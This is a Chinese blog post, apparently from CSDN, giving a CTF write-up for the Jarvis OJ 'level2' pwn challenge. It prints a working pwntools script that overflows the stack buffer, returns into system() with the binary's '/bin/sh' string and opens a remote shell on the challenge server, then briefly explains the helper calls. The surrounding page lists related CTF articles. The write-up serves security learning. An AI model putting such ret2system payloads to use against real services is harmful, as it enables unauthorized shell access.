Jarvis OJ - level2

最新推荐文章于 2020-04-04 22:20:59 发布
最新推荐文章于 2020-04-04 22:20:59 发布
阅读量224 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43464124/article/details/90302210
版权

这一题根上一题有很多相似的地方
而且比上一道还简单了不少
因为其给出了/bin/sh字符串
所以就不细说了
主要是因为exp比较有意思
学到了一些东西
所以想记录下来

from pwn import*
p = remote("pwn2.jarvisoj.com","9878")
elf = ELF("./level2")
sys_addr = elf.symbols["system"]
bin_addr = elf.search("/bin/sh").next()
payload = 'a'*140+p32(sys_addr)+'a'*4+p32(bin_addr)
p.recvuntil("Input:")
p.sendline(payload)
p.interactive()

现在是明白了 elf.symbols调用的确实是函数地址
是这个函数在这个程序中所在的位置
而你下断点所给出的位置是在程序运行过程中
遇到要用到这个函数的位置
elf.search("/bin/sh").next()
还有这个寻找字符串地址的方法
在IDA出错的时候会有用
‘a’*4的原因参见我的上一篇博客

Loggen~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj-level2
qq_35661990的博客
11-09 1369
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
oj level1-2
weixin_43600412的博客
07-24 251
今天学习了pwn三道简单题,发现一个规律,pwn题都绕不开写脚本,脚本主要内容根据情况而定,记录如下 文件直接用编辑器打开是看不到内容的,是一堆16进制代码,只能直接放进ida中查看。 level1:ida打开进入main函数的伪代码,具体操作不再累述: ...
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 655
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1069
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
CTF中的PWN——绕NX防护1(本地libc 栈溢出)
壊壊的诱惑你的博客
09-29 4190
进阶到防护篇了,首先学一下NX防护的基础题目。 NX防护 NX是数据与程序的分水岭,栈溢出核心思想是通过局部变量覆盖函数返回地址来修改EIP和注入 Shellcode,在函数返回时跳到Shellcode去执行。要防止这种攻击,最有效的办法就是让攻击者注入的Shellcode无法执行,这就是数据执行保护(Data Execution Prevention, DEP)安全机制的初衷...
JarvisAlgorithm:Jarvis算法-Java
03-06
2. **找到最近的点**:对于起始点,遍历其余所有点,找出与起始点距离最近的点。 3. **连接最近点**:将起始点与最近点连成一条线段,并将最近点作为新的当前点。 4. **迭代过程**:重复第二步和第三步,直到返回到...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
JARVIS--AI-Based-Assistant:简单的JARVIS语音助手
04-06
**JARVIS--AI-Based-Assistant: 简单的JARVIS语音助手** JARVIS,这个名字来源于漫威电影中的贾维斯人工智能系统,现在我们将其应用到一个基于AI的语音助手中。这个项目主要使用Python编程语言来实现,为用户提供了...
攻防世界PWN之Hacknote题解
seaaseesa的博客
11-09 1438
Hacknote 首先,查看程序的保护机制 然后拖入IDA分析 这是创建堆,并写入信息。 经过分析,大概是这样的 typedefstructNote{ void*func;//函数指针 char*buf;//内容指针 }Note; //保存Node的指针数组 Note*notes[5]; int...
linux重要指令
编程资料大全
03-30 83
linux当中的一些比较重要的指令。。 ls列出文件目录 pwd显示当前所在的路径 logout退出 mkdir创建目录 ls -l显示详细 cd homework改变当前路径 进入homework; cd返回上一级目录 rmdir 删除一个空目录 vi编译器文件存在就打开 不存在就创建 shift+:底部输入命令 set number 显示行号 回车 按I键 esc...
pwn题查找字符串方法记录
SkYe's Blog
04-04 4547
记忆力不太好,简单记录一下,用作备忘 假设现在有文件如下: 待 Pwn 程序:mypwn libc 文件:libc.so 需要查找的字符串 /bin/sh 在上诉两个文件中都存在。 查找程序中的字符串 0x0 IDA strings window 将程序加载到 IDA 后,使用快捷键 shift+F12 打开 strings window ,查看程序中出现的全部字符。 0x1 Linux...
CG-CTF——你大概需要一个优秀的mac
weixin_43464124的博客
12-02 1805
由于上个星期比赛的原因,发现了自己许许多多的问题,尤其是在python方面,几乎是一片空白,所以这个星期恶补了一下python,算是搞清楚了一些,打算找个题练练手,不能纸上谈兵不是QAQ 这是CG-CTF一道老题了,之前因为不会python一直没写,今天就拿它来看看。 用IDA打开来看,是这样的: 很明显它是经过func1,xfunc1…xfunc5这六个函数一番操作之后达到check函数需要满足...
之前在网上看的PWN入门的教学视频
weixin_43464124的博客
11-16 953
PWN:攻破设备及系统 题目:nc binary libc 方法:逆向分析,定位漏洞 构造数据与程序交互(2.3步相互交错) 调试程序 get shell 漏洞:缓冲区溢出:栈 堆 栈:数据结构 后进先出 push pop 保留了函数调用的信息 寄存器:esp指向栈顶 ebp指向栈帧底部 eip指向下一个要跳转的地址 返回地址是攻击目标 函数内的局部变量全部放在栈中(全局变量不在栈中,不关注) 栈...
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 810
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
新年第一题,一道简单的MISC(嘻嘻嘻嘻嘻)
weixin_43464124的博客
01-19 726
由于期末考试的原因,中间间隔了好长时间没有看CTF的题目,既然放寒假了,就要继续加油啦!!!! 首先先随便找了道题练练手,恢复一下手感。 题目地址:Is kill can fix? Sign the autopsy file? OK,这是一道misc题,把附件下载下来之后发现是一个数据包。 好吧,最近遇到了好多数据包的题。QAQ 我们尝试打开它… 然鹅!!!! 好吧,这就很令人费解(黑人问号脸)...
pwnable.kr-bof
weixin_43464124的博客
11-20 538
第第第第第…三题了 首先看看题目: 按照题目要求,我们就先把bof 和bof.c下载下来看看吧(因为我还是习惯用Windows,而且我的ida也在Windows上,所以手动下载QAQ)。 打开看看: 不长的c程序,很简单的溢出。很明显直接按照他的方式key的值是无法system("/bin/sh")的,因此我们通过溢出覆盖掉这个key的值。但是我们只能通过输入overflow的值来溢出,所以我们看...
jarvisoj_level2
最新发布
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值